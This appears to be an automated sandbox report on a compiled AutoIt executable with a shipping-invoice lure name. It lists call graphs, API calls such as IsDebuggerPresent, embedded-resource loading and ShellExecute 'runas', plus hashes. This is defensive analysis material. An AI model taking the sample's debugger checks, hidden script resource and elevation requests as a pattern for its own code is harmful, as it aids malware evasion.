7b37ef 103704->103705 103826 7b928a 103705->103826 103706 7b4e4a 84 API calls 103706->103703 103708 7ed19f 103707->103708 103710 7b4e4a 84 API calls 103708->103710 103712 7ed1a8 103710->103712 103716 7b3ed0 59 API calls 103712->103716 103713 7b7de1 59 API calls 103714 7b3808 103713->103714 103715 7b84c0 69 API calls 103714->103715 103717 7b381a Mailbox 103715->103717 103718 7ed1c3 103716->103718 103719 7b7de1 59 API calls 103717->103719 103720 7b3ed0 59 API calls 103718->103720 103721 7b3840 103719->103721 103722 7ed1df 103720->103722 103723 7b84c0 69 API calls 103721->103723 103724 7b4706 61 API calls 103722->103724 103726 7b384f Mailbox 103723->103726 103725 7ed204 103724->103725 103727 7b3ed0 59 API calls 103725->103727 103729 7b7667 59 API calls 103726->103729 103728 7ed210 103727->103728 103730 7b8047 59 API calls 103728->103730 103731 7b386d 103729->103731 103732 7ed21e 103730->103732 103829 7b3ed0 103731->103829 103734 7b3ed0 59 API calls 103732->103734 103736 7ed22d 103734->103736 103742 7b8047 59 API calls 103736->103742 103738 7b3887 103738->103712 103739 7b3891 103738->103739 103740 7d2efd _W_store_winword 60 API calls 103739->103740 103741 7b389c 103740->103741 103741->103718 103743 7b38a6 103741->103743 103744 7ed24f 103742->103744 103745 7d2efd _W_store_winword 60 API calls 103743->103745 103746 7b3ed0 59 API calls 103744->103746 103747 7b38b1 103745->103747 103748 7ed25c 103746->103748 103747->103722 103749 7b38bb 103747->103749 103748->103748 103750 7d2efd _W_store_winword 60 API calls 103749->103750 103752 7b38c6 103750->103752 103751 7b3907 103751->103736 103753 7b3914 103751->103753 103752->103736 103752->103751 103754 7b3ed0 59 API calls 103752->103754 103756 7b92ce 59 API calls 103753->103756 103755 7b38ea 103754->103755 103757 7b8047 59 API calls 103755->103757 103758 7b3924 103756->103758 103759 7b38f8 103757->103759 103760 7b9050 59 API calls 103758->103760 103761 7b3ed0 59 API calls 103759->103761 103762 7b3932 103760->103762 103761->103751 103845 7b8ee0 103762->103845 103764 7b928a 59 API calls 103766 7b394f 103764->103766 103765 7b8ee0 60 API calls 103765->103766 103766->103764 103766->103765 103767 7b3ed0 59 API calls 103766->103767 103768 7b3995 Mailbox 103766->103768 103767->103766 103768->103638 103770 7b7292 __ftell_nolock 103769->103770 103771 7b72ab 103770->103771 103772 7eea22 _memset 103770->103772 103773 7b4750 60 API calls 103771->103773 103774 7eea3e GetOpenFileNameW 103772->103774 103775 7b72b4 103773->103775 103776 7eea8d 103774->103776 103894 7d0791 103775->103894 103778 7b7bcc 59 API calls 103776->103778 103781 7eeaa2 103778->103781 103781->103781 103782 7b72c9 103912 7b686a 103782->103912 103810->103648 103813 7b3d3e __ftell_nolock 103812->103813 103814 7b7bcc 59 API calls 103813->103814 103819 7b3ea4 Mailbox 103813->103819 103816 7b3d70 103814->103816 103815 7b79f2 59 API calls 103815->103816 103816->103815 103824 7b3da6 Mailbox 103816->103824 103817 7b79f2 59 API calls 103817->103824 103818 7b3e77 103818->103819 103820 7b7de1 59 API calls 103818->103820 103819->103692 103822 7b3e98 103820->103822 103821 7b7de1 59 API calls 103821->103824 103823 7b3f74 59 API calls 103822->103823 103823->103819 103824->103817 103824->103818 103824->103819 103824->103821 103825 7b3f74 59 API calls 103824->103825 103825->103824 103827 7d0db6 Mailbox 59 API calls 103826->103827 103828 7b37fb 103827->103828 103828->103713 103830 7b3eda 103829->103830 103831 7b3ef3 103829->103831 103832 7b8047 59 API calls 103830->103832 103833 7b7bcc 59 API calls 103831->103833 103834 7b3879 103832->103834 103833->103834 103835 7d2efd 103834->103835 103836 7d2f7e 103835->103836 103837 7d2f09 103835->103837 103891 7d2f90 60 API calls 4 library calls 103836->103891 103844 7d2f2e 103837->103844 103889 7d8b28 58 API calls __getptd_noexit 103837->103889 103839 7d2f8b 103839->103738 103841 7d2f15 103890 7d8db6 9 API calls _fprintf 103841->103890 103843 7d2f20 103843->103738 103844->103738 103846 7ef17c 103845->103846 103851 7b8ef7 103845->103851 103846->103851 103893 7b8bdb 59 API calls Mailbox 103846->103893 103848 7b8ff8 103852 7d0db6 Mailbox 59 API calls 103848->103852 103849 7b9040 103892 7b9d3c 60 API calls Mailbox 103849->103892 103851->103848 103851->103849 103853 7b8fff 103851->103853 103852->103853 103853->103766 103855 7b4ee5 85 API calls 103854->103855 103856 8195ca 103855->103856 103857 819734 96 API calls 103856->103857 103858 8195dc 103857->103858 103859 7b4f0b 74 API calls 103858->103859 103887 7ed186 103858->103887 103860 8195f7 103859->103860 103861 7b4f0b 74 API calls 103860->103861 103862 819607 103861->103862 103863 7b4f0b 74 API calls 103862->103863 103864 819622 103863->103864 103865 7b4f0b 74 API calls 103864->103865 103866 81963d 103865->103866 103867 7b4ee5 85 API calls 103866->103867 103868 819654 103867->103868 103869 7d571c _W_store_winword 58 API calls 103868->103869 103870 81965b 103869->103870 103871 7d571c _W_store_winword 58 API calls 103870->103871 103872 819665 103871->103872 103873 7b4f0b 74 API calls 103872->103873 103874 819679 103873->103874 103875 819109 GetSystemTimeAsFileTime 103874->103875 103876 81968c 103875->103876 103877 8196a1 103876->103877 103878 8196b6 103876->103878 103879 7d2d55 _free 58 API calls 103877->103879 103880 81971b 103878->103880 103881 8196bc 103878->103881 103883 8196a7 103879->103883 103882 7d2d55 _free 58 API calls 103880->103882 103884 818b06 116 API calls 103881->103884 103882->103887 103885 7d2d55 _free 58 API calls 103883->103885 103886 819713 103884->103886 103885->103887 103888 7d2d55 _free 58 API calls 103886->103888 103887->103703 103887->103706 103888->103887 103889->103841 103890->103843 103891->103839 103892->103853 103893->103851 103895 7e1940 __ftell_nolock 103894->103895 103896 7d079e GetLongPathNameW 103895->103896 103897 7b7bcc 59 API calls 103896->103897 103898 7b72bd 103897->103898 103899 7b700b 103898->103899 103900 7b7667 59 API calls 103899->103900 103901 7b701d 103900->103901 103902 7b4750 60 API calls 103901->103902 103903 7b7028 103902->103903 103904 7b7033 103903->103904 103908 7ee885 103903->103908 103906 7b3f74 59 API calls 103904->103906 103907 7b703f 103906->103907 103946 7b34c2 103907->103946 103909 7ee89f 103908->103909 103952 7b7908 61 API calls 103908->103952 103911 7b7052 Mailbox 103911->103782 103913 7b4ddd 136 API calls 103912->103913 103914 7b688f 103913->103914 103915 7ee031 103914->103915 103916 7b4ddd 136 API calls 103914->103916 103917 81955b 122 API calls 103915->103917 103918 7b68a3 103916->103918 103919 7ee046 103917->103919 103918->103915 103920 7b68ab 103918->103920 103921 7ee04a 103919->103921 103922 7ee067 103919->103922 103924 7ee052 103920->103924 103925 7b68b7 103920->103925 103926 7b4e4a 84 API calls 103921->103926 103923 7d0db6 Mailbox 59 API calls 103922->103923 103929 7ee0ac Mailbox 103923->103929 104061 8142f8 90 API calls _wprintf 103924->104061 103953 7b6a8c 103925->103953 103926->103924 103932 7ee260 103929->103932 103936 7b750f 59 API calls 103929->103936 103940 7ee271 103929->103940 103943 7b7de1 59 API calls 103929->103943 104046 80f73d 103929->104046 104049 81737f 103929->104049 104055 7b735d 103929->104055 104062 80f65e 61 API calls 2 library calls 103929->104062 103931 7ee060 103931->103922 103933 7d2d55 _free 58 API calls 103932->103933 103934 7ee268 103933->103934 103935 7b4e4a 84 API calls 103934->103935 103935->103940 103936->103929 103939 7d2d55 _free 58 API calls 103939->103940 103940->103939 103941 7b4e4a 84 API calls 103940->103941 104063 80f7a1 89 API calls 4 library calls 103940->104063 103941->103940 103943->103929 103947 7b34d4 103946->103947 103951 7b34f3 _memmove 103946->103951 103949 7d0db6 Mailbox 59 API calls 103947->103949 103948 7d0db6 Mailbox 59 API calls 103950 7b350a 103948->103950 103949->103951 103950->103911 103951->103948 103952->103908 103954 7ee41e 103953->103954 103955 7b6ab5 103953->103955 104085 80f7a1 89 API calls 4 library calls 103954->104085 104069 7b57a6 60 API calls Mailbox 103955->104069 103958 7ee431 104086 80f7a1 89 API calls 4 library calls 103958->104086 103959 7b6ad7 104070 7b57f6 67 API calls 103959->104070 103961 7b6aec 103961->103958 103962 7b6af4 103961->103962 103964 7b7667 59 API calls 103962->103964 103966 7b6b00 103964->103966 103965 7ee44d 103968 7b6b61 103965->103968 104071 7d0957 60 API calls __ftell_nolock 103966->104071 103970 7b6b6f 103968->103970 103971 7ee460 103968->103971 103969 7b6b0c 103973 7b7667 59 API calls 103969->103973 103972 7b7667 59 API calls 103970->103972 103974 7b5c6f CloseHandle 103971->103974 103975 7b6b78 103972->103975 103976 7b6b18 103973->103976 103977 7ee46c 103974->103977 103978 7b7667 59 API calls 103975->103978 103979 7b4750 60 API calls 103976->103979 103980 7b4ddd 136 API calls 103977->103980 103982 7b6b81 103978->103982 103983 7b6b26 103979->103983 103981 7ee488 103980->103981 103984 7ee4b1 103981->103984 103987 81955b 122 API calls 103981->103987 103985 7b459b 59 API calls 103982->103985 104072 7b5850 ReadFile SetFilePointerEx 103983->104072 104087 80f7a1 89 API calls 4 library calls 103984->104087 103988 7b6b98 103985->103988 103991 7ee4a4 103987->103991 103992 7b7b2e 59 API calls 103988->103992 103990 7b6b52 104073 7b5aee SetFilePointerEx SetFilePointerEx 103990->104073 103995 7ee4ac 103991->103995 103996 7ee4cd 103991->103996 103997 7b6ba9 SetCurrentDirectoryW 103992->103997 103993 7ee4c8 104024 7b6d0c Mailbox 103993->104024 103998 7b4e4a 84 API calls 103995->103998 103999 7b4e4a 84 API calls 103996->103999 104002 7b6bbc Mailbox 103997->104002 103998->103984 104000 7ee4d2 103999->104000 104001 7d0db6 Mailbox 59 API calls 104000->104001 104007 7ee506 104001->104007 104004 7d0db6 Mailbox 59 API calls 104002->104004 104006 7b6bcf 104004->104006 104008 7b522e 59 API calls 104006->104008 104009 7b750f 59 API calls 104007->104009 104064 7b57d4 104024->104064 104047 7d0db6 Mailbox 59 API calls 104046->104047 104048 80f76d _memmove 104047->104048 104048->103929 104050 81738a 104049->104050 104051 7d0db6 Mailbox 59 API calls 104050->104051 104052 8173a1 104051->104052 104053 7b7de1 59 API calls 104052->104053 104054 8173b0 104052->104054 104053->104054 104054->103929 104056 7b7370 104055->104056 104059 7b741e 104055->104059 104058 7d0db6 Mailbox 59 API calls 104056->104058 104060 7b73a2 104056->104060 104057 7d0db6 59 API calls Mailbox 104057->104060 104058->104060 104059->103929 104060->104057 104060->104059 104061->103931 104062->103929 104063->103940 104065 7b5c6f CloseHandle 104064->104065 104066 7b57dc Mailbox 104065->104066 104067 7b5c6f CloseHandle 104066->104067 104069->103959 104070->103961 104071->103969 104072->103990 104073->103968 104085->103958 104086->103965 104087->103993 104111 7b1066 104116 7bf76f 104111->104116 104113 7b106c 104114 7d2d40 __cinit 67 API calls 104113->104114 104115 7b1076 104114->104115 104117 7bf790 104116->104117 104149 7cff03 104117->104149 104121 7bf7d7 104122 7b7667 59 API calls 104121->104122 104123 7bf7e1 104122->104123 104124 7b7667 59 API calls 104123->104124 104125 7bf7eb 104124->104125 104126 7b7667 59 API calls 104125->104126 104127 7bf7f5 104126->104127 104128 7b7667 59 API calls 104127->104128 104129 7bf833 104128->104129 104130 7b7667 59 API calls 104129->104130 104131 7bf8fe 104130->104131 104159 7c5f87 104131->104159 104135 7bf930 104136 7b7667 59 API calls 104135->104136 104137 7bf93a 104136->104137 104187 7cfd9e 104137->104187 104139 7bf981 104140 7bf991 GetStdHandle 104139->104140 104141 7f45ab 104140->104141 104142 7bf9dd 104140->104142 104141->104142 104144 7f45b4 104141->104144 104143 7bf9e5 OleInitialize 104142->104143 104143->104113 104194 816b38 64 API calls Mailbox 104144->104194 104146 7f45bb 104195 817207 CreateThread 104146->104195 104148 7f45c7 CloseHandle 104148->104143 104196 7cffdc 104149->104196 104152 7cffdc 59 API calls 104153 7cff45 104152->104153 104154 7b7667 59 API calls 104153->104154 104155 7cff51 104154->104155 104156 7b7bcc 59 API calls 104155->104156 104157 7bf796 104156->104157 104158 7d0162 6 API calls 104157->104158 104158->104121 104160 7b7667 59 API calls 104159->104160 104161 7c5f97 104160->104161 104162 7b7667 59 API calls 104161->104162 104163 7c5f9f 104162->104163 104203 7c5a9d 104163->104203 104166 7c5a9d 59 API calls 104167 7c5faf 104166->104167 104168 7b7667 59 API calls 104167->104168 104169 7c5fba 104168->104169 104170 7d0db6 Mailbox 59 API calls 104169->104170 104171 7bf908 104170->104171 104172 7c60f9 104171->104172 104173 7c6107 104172->104173 104174 7b7667 59 API calls 104173->104174 104175 7c6112 104174->104175 104176 7b7667 59 API calls 104175->104176 104177 7c611d 104176->104177 104178 7b7667 59 API calls 104177->104178 104179 7c6128 104178->104179 104180 7b7667 59 API calls 104179->104180 104181 7c6133 104180->104181 104182 7c5a9d 59 API calls 104181->104182 104183 7c613e 104182->104183 104184 7d0db6 Mailbox 59 API calls 104183->104184 104185 7c6145 RegisterWindowMessageW 104184->104185 104185->104135 104188 7cfdae 104187->104188 104189 80576f 104187->104189 104190 7d0db6 Mailbox 59 API calls 104188->104190 104206 819ae7 60 API calls 104189->104206 104193 7cfdb6 104190->104193 104192 80577a 104193->104139 104194->104146 104195->104148 104207 8171ed 65 API calls 104195->104207 104197 7b7667 59 API calls 104196->104197 104198 7cffe7 104197->104198 104199 7b7667 59 API calls 104198->104199 104200 7cffef 104199->104200 104201 7b7667 59 API calls 104200->104201 104202 7cff3b 104201->104202 104202->104152 104204 7b7667 59 API calls 104203->104204 104205 7c5aa5 104204->104205 104205->104166 104206->104192 104208 7b1016 104213 7b4974 104208->104213 104211 7d2d40 __cinit 67 API calls 104212 7b1025 104211->104212 104214 7d0db6 Mailbox 59 API calls 104213->104214 104215 7b497c 104214->104215 104216 7b101b 104215->104216 104220 7b4936 104215->104220 104216->104211 104221 7b493f 104220->104221 104222 7b4951 104220->104222 104223 7d2d40 __cinit 67 API calls 104221->104223 104224 7b49a0 104222->104224 104223->104222 104225 7b7667 59 API calls 104224->104225 104226 7b49b8 GetVersionExW 104225->104226 104227 7b7bcc 59 API calls 104226->104227 104228 7b49fb 104227->104228 104229 7b7d2c 59 API calls 104228->104229 104232 7b4a28 104228->104232 104230 7b4a1c 104229->104230 104231 7b7726 59 API calls 104230->104231 104231->104232 104233 7b4a93 GetCurrentProcess IsWow64Process 104232->104233 104235 7ed864 104232->104235 104234 7b4aac 104233->104234 104236 7b4b2b GetSystemInfo 104234->104236 104237 7b4ac2 104234->104237 104238 7b4af8 104236->104238 104248 7b4b37 104237->104248 104238->104216 104241 7b4b1f GetSystemInfo 104244 7b4ae9 104241->104244 104242 7b4ad4 104243 7b4b37 2 API calls 104242->104243 104245 7b4adc GetNativeSystemInfo 104243->104245 104244->104238 104246 7b4aef FreeLibrary 104244->104246 104245->104244 104246->104238 104249 7b4ad0 104248->104249 104250 7b4b40 LoadLibraryA 104248->104250 104249->104241 104249->104242 104250->104249 104251 7b4b51 GetProcAddress 104250->104251 104251->104249 104252 7b1055 104257 7b2649 104252->104257 104255 7d2d40 __cinit 67 API calls 104256 7b1064 104255->104256 104258 7b7667 59 API calls 104257->104258 104259 7b26b7 104258->104259 104264 7b3582 104259->104264 104261 7b2754 104263 7b105a 104261->104263 104267 7b3416 59 API calls 2 library calls 104261->104267 104263->104255 104268 7b35b0 104264->104268 104267->104261 104269 7b35a1 104268->104269 104270 7b35bd 104268->104270 104269->104261 104270->104269 104271 7b35c4 RegOpenKeyExW 104270->104271 104271->104269 104272 7b35de RegQueryValueExW 104271->104272 104273 7b35ff 104272->104273 104274 7b3614 RegCloseKey 104272->104274 104273->104274 104274->104269

                                                                                    Executed Functions

                                                                                    Function 007B3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B3B68
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 007B3B7A
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,008752F8,008752E0,?,?), ref: 007B3BEB
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                      • Part of subcall function 007C092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3C14,008752F8,?,?,?), ref: 007C096E
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007B3C6F
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00867770,00000010), ref: 007ED281
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,008752F8,?,?,?), ref: 007ED2B9
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00864260,008752F8,?,?,?), ref: 007ED33F
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 007ED346
                                                                                      • Part of subcall function 007B3A46: GetSysColorBrush.USER32(0000000F), ref: 007B3A50
                                                                                      • Part of subcall function 007B3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007B3A5F
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(00000063), ref: 007B3A76
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(000000A4), ref: 007B3A88
                                                                                      • Part of subcall function 007B3A46: LoadIconW.USER32(000000A2), ref: 007B3A9A
                                                                                      • Part of subcall function 007B3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007B3AC0
                                                                                      • Part of subcall function 007B3A46: RegisterClassExW.USER32(?), ref: 007B3B16
                                                                                      • Part of subcall function 007B39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B3A03
                                                                                      • Part of subcall function 007B39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3A24
                                                                                      • Part of subcall function 007B39D5: ShowWindow.USER32(00000000,?,?), ref: 007B3A38
                                                                                      • Part of subcall function 007B39D5: ShowWindow.USER32(00000000,?,?), ref: 007B3A41
                                                                                      • Part of subcall function 007B434A: _memset.LIBCMT ref: 007B4370
                                                                                      • Part of subcall function 007B434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B4415
                                                                                    Strings
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 007ED279
                                                                                    • runas, xrefs: 007ED33A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 529118366-3287110873
                                                                                    • Opcode ID: d404285e140fdb4c54e55b3a113297dfd197b488d3b969519b9da20af4a765b2
                                                                                    • Instruction ID: 9173bba10b088c3350b655a9c89661c4e3279febfde41d9a228707618d8f6358
                                                                                    • Opcode Fuzzy Hash: d404285e140fdb4c54e55b3a113297dfd197b488d3b969519b9da20af4a765b2
                                                                                    • Instruction Fuzzy Hash: 9951D330D08248EADF11EBF4DC0DFED7B79BB45710F004069F525A22A7DAB89A85CB61
                                                                                    Function 007B49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 998 7b49a0-7b4a00 call 7b7667 GetVersionExW call 7b7bcc 1003 7b4b0b-7b4b0d 998->1003 1004 7b4a06 998->1004 1005 7ed767-7ed773 1003->1005 1006 7b4a09-7b4a0e 1004->1006 1007 7ed774-7ed778 1005->1007 1008 7b4b12-7b4b13 1006->1008 1009 7b4a14 1006->1009 1011 7ed77a 1007->1011 1012 7ed77b-7ed787 1007->1012 1010 7b4a15-7b4a4c call 7b7d2c call 7b7726 1008->1010 1009->1010 1020 7b4a52-7b4a53 1010->1020 1021 7ed864-7ed867 1010->1021 1011->1012 1012->1007 1014 7ed789-7ed78e 1012->1014 1014->1006 1016 7ed794-7ed79b 1014->1016 1016->1005 1018 7ed79d 1016->1018 1022 7ed7a2-7ed7a5 1018->1022 1020->1022 1023 7b4a59-7b4a64 1020->1023 1024 7ed869 1021->1024 1025 7ed880-7ed884 1021->1025 1026 7ed7ab-7ed7c9 1022->1026 1027 7b4a93-7b4aaa GetCurrentProcess IsWow64Process 1022->1027 1028 7b4a6a-7b4a6c 1023->1028 1029 7ed7ea-7ed7f0 1023->1029 1030 7ed86c 1024->1030 1032 7ed86f-7ed878 1025->1032 1033 7ed886-7ed88f 1025->1033 1026->1027 1031 7ed7cf-7ed7d5 1026->1031 1034 7b4aaf-7b4ac0 1027->1034 1035 7b4aac 1027->1035 1036 7b4a72-7b4a75 1028->1036 1037 7ed805-7ed811 1028->1037 1040 7ed7fa-7ed800 1029->1040 1041 7ed7f2-7ed7f5 1029->1041 1030->1032 1038 7ed7df-7ed7e5 1031->1038 1039 7ed7d7-7ed7da 1031->1039 1032->1025 1033->1030 1042 7ed891-7ed894 1033->1042 1043 7b4b2b-7b4b35 GetSystemInfo 1034->1043 1044 7b4ac2-7b4ad2 call 7b4b37 1034->1044 1035->1034 1045 7b4a7b-7b4a8a 1036->1045 1046 7ed831-7ed834 1036->1046 1048 7ed81b-7ed821 1037->1048 1049 7ed813-7ed816 1037->1049 1038->1027 1039->1027 1040->1027 1041->1027 1042->1032 1047 7b4af8-7b4b08 1043->1047 1055 7b4b1f-7b4b29 GetSystemInfo 1044->1055 1056 7b4ad4-7b4ae1 call 7b4b37 1044->1056 1052 7ed826-7ed82c 1045->1052 1053 7b4a90 1045->1053 1046->1027 1051 7ed83a-7ed84f 1046->1051 1048->1027 1049->1027 1057 7ed859-7ed85f 1051->1057 1058 7ed851-7ed854 1051->1058 1052->1027 1053->1027 1060 7b4ae9-7b4aed 1055->1060 1063 7b4b18-7b4b1d 1056->1063 1064 7b4ae3-7b4ae7 GetNativeSystemInfo 1056->1064 1057->1027 1058->1027 1060->1047 1062 7b4aef-7b4af2 FreeLibrary 1060->1062 1062->1047 1063->1064 1064->1060
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 007B49CD
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • GetCurrentProcess.KERNEL32(?,0083FAEC,00000000,00000000,?), ref: 007B4A9A
                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 007B4AA1
                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007B4AE7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 007B4AF2
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 007B4B23
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 007B4B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1986165174-0
                                                                                    • Opcode ID: 66a1595209c89956d19d850fc3fb043eed510492cfe661e114e626bccaafd4b1
                                                                                    • Instruction ID: 248d24d7f7c28e7fb18c74f5e49553b9f52d36a23f3fc6d208e90811ad1230da
                                                                                    • Opcode Fuzzy Hash: 66a1595209c89956d19d850fc3fb043eed510492cfe661e114e626bccaafd4b1
                                                                                    • Instruction Fuzzy Hash: 4291C63198A7C0DEC731DB7899506EBFFF5AF6A300B444D6ED0C793A42D228A908C759
                                                                                    Function 007B4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1065 7b4e89-7b4ea1 CreateStreamOnHGlobal 1066 7b4ea3-7b4eba FindResourceExW 1065->1066 1067 7b4ec1-7b4ec6 1065->1067 1068 7b4ec0 1066->1068 1069 7ed933-7ed942 LoadResource 1066->1069 1068->1067 1069->1068 1070 7ed948-7ed956 SizeofResource 1069->1070 1070->1068 1071 7ed95c-7ed967 LockResource 1070->1071 1071->1068 1072 7ed96d-7ed98b 1071->1072 1072->1068
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007B4D8E,?,?,00000000,00000000), ref: 007B4E99
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B4D8E,?,?,00000000,00000000), ref: 007B4EB0
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F), ref: 007ED937
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F), ref: 007ED94C
                                                                                    • LockResource.KERNEL32(007B4D8E,?,?,007B4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007B4E2F,00000000), ref: 007ED95F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: 5f7066001a85da276c01757ec96672ccd90e109930c349dfb76132fb9d4f8c54
                                                                                    • Instruction ID: 3540753ac35e2de54c40ee0a4afc733be214a8ffe631ae2b47a18f086e75e84c
                                                                                    • Opcode Fuzzy Hash: 5f7066001a85da276c01757ec96672ccd90e109930c349dfb76132fb9d4f8c54
                                                                                    • Instruction Fuzzy Hash: 8E115A75640700BFDB218B65EC48F677BBAFBC5B11F204668F506C6262DB61EC008AA0
                                                                                    Function 007BFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID:
                                                                                    • API String ID: 3964851224-0
                                                                                    • Opcode ID: a0db12ad00e79627b5adbfcd208362b3c766af835458cd530746a519080bc85d
                                                                                    • Instruction ID: 0d48ee2633d638c13c90c1e67e40c879d49a99513f3ec6400ecb31940da7c283
                                                                                    • Opcode Fuzzy Hash: a0db12ad00e79627b5adbfcd208362b3c766af835458cd530746a519080bc85d
                                                                                    • Instruction Fuzzy Hash: B9925570608341CFD720DF28C484B6ABBE5BF85304F14896DE99A9B362D779EC45CB92
                                                                                    Function 0081445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
